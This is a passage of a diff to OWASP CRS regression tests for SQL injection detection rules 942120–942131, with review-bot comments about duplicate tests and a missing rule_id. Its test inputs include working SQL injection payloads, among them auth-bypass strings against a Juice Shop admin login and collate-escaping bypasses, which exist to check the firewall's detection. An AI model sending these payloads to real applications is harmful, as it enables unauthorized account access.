+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay= in ( Aa,- Ab-, and Ac)" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 21 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "%3E%3D" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-22 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "%3E%3D" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 22 desc: "SQL Injection Attack: not between * and " stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "select%20*%20from%20user%20where%20password_last_changed%20not%20between%20'2021-04-11'%20and%20'2021-04-11'" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-23 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "select%20*%20from%20user%20where%20password_last_changed%20not%20between%20'2021-04-11'%20and%20'2021-04-11'" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 23 desc: 
"SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=z'or%20email%20notnull--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-24 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=z'or%20email%20notnull--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 24 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=x'%20or%20username%20like%20totpSecret%20escape%20'x';" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-25 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=x'%20or%20username%20like%20totpSecret%20escape%20'x';" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 25 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - 
data: "email=admin%40juice-sh.op'%20and%20email%20ilike%20email--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-26 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op'%20and%20email%20ilike%20email--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 26 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40juice-sh.op'%20and%20email%20%3d%20all%20(select%20email)--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-27 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op'%20and%20email%20%3d%20all%20(select%20email)--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 27 desc: "SQLite collate nocase" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=user'collate%20nocase--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-28 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=user'collate%20nocase--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 28 desc: "SQLite collate nocase" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=user'collate%20nocase--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-29 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=user'collate%20nocase--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 29 desc: "SQL collate`nocase`" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=user'collate%60nocase%60--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-30 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=user'collate%60nocase%60--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 30 desc: "Invalid SQL collate foo" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=user'collate%20foo--" - version: HTTP/1.0 - output: - no_log_contains: id "942120" - - test_title: 942120-31 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=user'collate%20foo--" + version: HTTP/1.0 + output: + no_log_contains: id "942120" + - test_id: 31 desc: "Invalid SQL collate foo" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # collate`utf8mb4_general_ci` - data: "var=user'collate%60utf8mb4_general_ci%60--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-32 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # collate`utf8mb4_general_ci` + data: "var=user'collate%60utf8mb4_general_ci%60--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 32 desc: "Collate bypass with character escaping" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # collate"\utf8mb4_general_ci" - data: "var=user'collate%22%5Cutf8mb4_general_ci%22--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-33 + - 
input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # collate"\utf8mb4_general_ci" + data: "var=user'collate%22%5Cutf8mb4_general_ci%22--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 33 desc: "Collate bypass with postgress string escaping U&" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # collate U&"\0441\043B\043E\043D" - data: "var=user'collate U%26%22%241%23B%23E%23D%22--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-34 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # collate U&"\0441\043B\043E\043D" + data: "var=user'collate U%26%22%241%23B%23E%23D%22--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 34 desc: "Detect auth bypass email=' notnull --" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=%27%20notnull%20--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-35 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 
+ uri: "/post" + data: "email=%27%20notnull%20--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 35 desc: "Test for IJ5N1CXB - unlikely" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40juice-sh.op'and%20unlikely%20(id)--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-36 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op'and%20unlikely%20(id)--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 36 desc: "Negative test for IJ5N1CXB - unlikely" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: - text=It is highly unlikely this is going to be a false positive - version: HTTP/1.0 - output: - no_log_contains: id "942120" - - test_title: 942120-37 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: text=It is highly unlikely this is going to be a false positive + version: HTTP/1.0 + output: + no_log_contains: id "942120" + - test_id: 37 desc: "Test for HOH7M88Q - likelihood" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: | - email=admin%40juice-sh.op\'%20and(%20likelihood%20(id,.0));' - version: HTTP/1.1 - output: - log_contains: id "942120" - - test_title: 942120-38 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: | + email=admin%40juice-sh.op\'%20and(%20likelihood%20(id,.0));' + version: HTTP/1.1 + output: + log_contains: id "942120" + - test_id: 38 desc: "Negative test for HOH7M88Q - likelihood" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: | - text=After calculating the likelihood this should not be matched. - version: HTTP/1.1 - output: - no_log_contains: id "942120" - - test_title: 942120-39 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: | + text=After calculating the likelihood this should not be matched. 
+ version: HTTP/1.1 + output: + no_log_contains: id "942120" + - test_id: 39 desc: "Detect path-based SQLi attempt" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: "*/*" - method: POST - uri: "/post/catalogue/rest/products/2499999||this.product/reviews" - version: HTTP/1.0 - output: - log_contains: id "942120" + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + method: POST + uri: "/post/catalogue/rest/products/2499999||this.product/reviews" + version: HTTP/1.0 + output: + log_contains: id "942120" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml index 594e372cf..7811cf31f 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml 
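Review bot: test_id 27 and test_id 28 on the new side are byte-identical (same desc "SQLite collate nocase", same `data: "var=user'collate%20nocase--"`, same `log_contains: id "942120"`), so one of them adds no coverage and should be dropped or given a distinct payload. test_id 31 keeps the desc "Invalid SQL collate foo" copied from test_id 30 while its payload is a valid backtick-quoted `utf8mb4_general_ci` collation that is expected to match, so the description contradicts the assertion; something like `desc: "SQL collate with backtick-quoted collation name"` would read correctly. Both problems are carried over from the removed lines rather than introduced here, but since this rewrite touches every test entry it is the natural place to fix them. Separately, test_id 36 is the only entry whose `data:` is an unquoted plain scalar (`data: text=It is highly unlikely this is going to be a false positive`); quoting it like every other `data:` value in the file keeps the style consistent and avoids a re-parse if the string ever gains a `: ` or ` #`.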
@@ -2,159 +2,147 @@ meta: author: "Christian S.J. Peron and Allan Boll, Franziska Bühler, azurit" description: None - enabled: true - name: 942130.yaml tests: - - test_title: 942130-1 + - test_id: 1 desc: "SQL Injection Attack: SQL Tautology" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=%221%22%20sSOUNDS%20LIKE%20%22SOUNDS%20LIKE%201&other_var=test" - version: HTTP/1.0 - output: - no_log_contains: id "942130" - - test_title: 942130-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=%221%22%20sSOUNDS%20LIKE%20%22SOUNDS%20LIKE%201&other_var=test" + version: HTTP/1.0 + output: + no_log_contains: id "942130" + - test_id: 2 desc: "SQL Injection Attack: SQL Tautology" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - uri: "/get?a=1=1" - version: HTTP/1.1 - output: - log_contains: id "942130" - - test_title: 942130-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=1=1" + version: HTTP/1.1 + output: + log_contains: id "942130" + - test_id: 3 desc: "SQL Injection Attack: SQL Tautology" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - uri: "/get?a=11=1" - version: HTTP/1.1 - output: - no_log_contains: id "942130" - - test_title: 942130-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=11=1" + version: HTTP/1.1 + output: + no_log_contains: id "942130" + - test_id: 4 desc: "SQL Injection Attack: SQL Tautology" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - uri: "/get?a=1=11" - version: HTTP/1.1 - output: - no_log_contains: id "942130" - - test_title: 942130-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=1=11" + version: HTTP/1.1 + output: + no_log_contains: id "942130" + - test_id: 5 desc: "SQL Injection Attack: SQL Tautology" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - uri: "/get?a=11!=11" - version: HTTP/1.1 - output: - no_log_contains: id "942130" - - test_title: 942130-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=11!=11" + version: HTTP/1.1 + output: + no_log_contains: id "942130" + - test_id: 6 desc: "SQL Injection 
Attack: SQL Tautology" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - uri: "/get?a=b,1=1" - version: HTTP/1.1 - output: - log_contains: id "942130" - - test_title: 942130-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=b,1=1" + version: HTTP/1.1 + output: + log_contains: id "942130" + - test_id: 7 desc: "SQL Injection Attack: SQL Tautology - like" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - data: "a=42%20like%2042" - version: HTTP/1.1 - output: - log_contains: id "942130" - - test_title: 942130-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "a=42%20like%2042" + version: HTTP/1.1 + output: + log_contains: id "942130" + - test_id: 8 desc: "SQL Injection Attack: SQL Tautology" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - uri: "/get?a=This%20is%20like%20no%20other" - version: HTTP/1.1 - output: - no_log_contains: id "942130" - - test_title: 942130-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=This%20is%20like%20no%20other" + version: HTTP/1.1 + output: + no_log_contains: id "942130" + - test_id: 9 desc: "SQL Injection Attack: SQL Tautology using MySQL NULL-safe operator <=>" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - uri: "/get?a=42<=>42" - version: HTTP/1.1 - output: - log_contains: id "942130" - - test_title: 942130-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=42<=>42" + version: HTTP/1.1 + output: + log_contains: id "942130" + - test_id: 10 desc: "SQL Injection Attack: SQL Tautology using glob" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - uri: "/get?user=admin%40juice-sh.op'%20and%20password%20glob%20password;" - version: HTTP/1.1 - output: - log_contains: id "942130" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?user=admin%40juice-sh.op'%20and%20password%20glob%20password;" + version: HTTP/1.1 + output: + log_contains: id "942130" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942131.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942131.yaml index 934a8ac84..7d5c7de4d 100644 
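Review bot: The removed `name: 942130.yaml` line in the meta block is not replaced by a `rule_id:` entry, whereas the parallel hunks for 942131.yaml and 942150.yaml add `+rule_id: 942131` and `+rule_id: 942150` next to the switch from `test_title: 942130-N` to bare `test_id: N`. Once the test id no longer carries the rule number, the rule under test has to come from somewhere else; if the runner reads it from `rule_id` rather than from the filename, every test in this file (and in 942140.yaml, which has the same omission) loses its association with the rule and only the `log_contains: id "942130"` assertions still name it. Adding `rule_id: 942130` after `description: None` keeps this file consistent with its siblings; the same one-line addition applies to the 942140.yaml hunk.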
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942131.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942131.yaml 
@@ -2,113 +2,105 @@ meta: author: "Felipe Zipitria" description: SQL Tautology - enabled: true - name: 942131.yaml +rule_id: 942131 tests: - - test_title: 942131-1 + - test_id: 1 desc: "SQL Injection Attack: SQL Tautology" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - uri: "/get?a=11!=1" - version: HTTP/1.1 - output: - log_contains: id "942131" - - test_title: 942131-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=11!=1" + version: HTTP/1.1 + output: + log_contains: id "942131" + - test_id: 2 desc: "SQL Injection Attack: SQL Tautology" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - uri: "/get?a=1!=11" - version: HTTP/1.1 - output: - log_contains: id "942131" - - test_title: 942131-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=1!=11" + version: HTTP/1.1 + output: + log_contains: id "942131" + - test_id: 3 desc: "SQL Injection Attack: SQL Tautology" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - uri: "/get?a=11!=11" - version: HTTP/1.1 - output: - no_log_contains: id "942131" - - test_title: 942131-4 + - 
input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=11!=11" + version: HTTP/1.1 + output: + no_log_contains: id "942131" + - test_id: 4 desc: "SQL Injection Attack: SQL Tautology" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - uri: "/get?a=1%20is%20not%202" - version: HTTP/1.1 - output: - log_contains: id "942131" - - test_title: 942131-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=1%20is%20not%202" + version: HTTP/1.1 + output: + log_contains: id "942131" + - test_id: 5 desc: "SQL Injection Attack: SQL Tautology negative" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - uri: "/get?a=1%20is%20not%201" - version: HTTP/1.1 - output: - no_log_contains: id "942131" - - test_title: 942131-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=1%20is%20not%201" + version: HTTP/1.1 + output: + no_log_contains: id "942131" + - test_id: 6 desc: "SQL Injection Attack: SQL Tautology" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
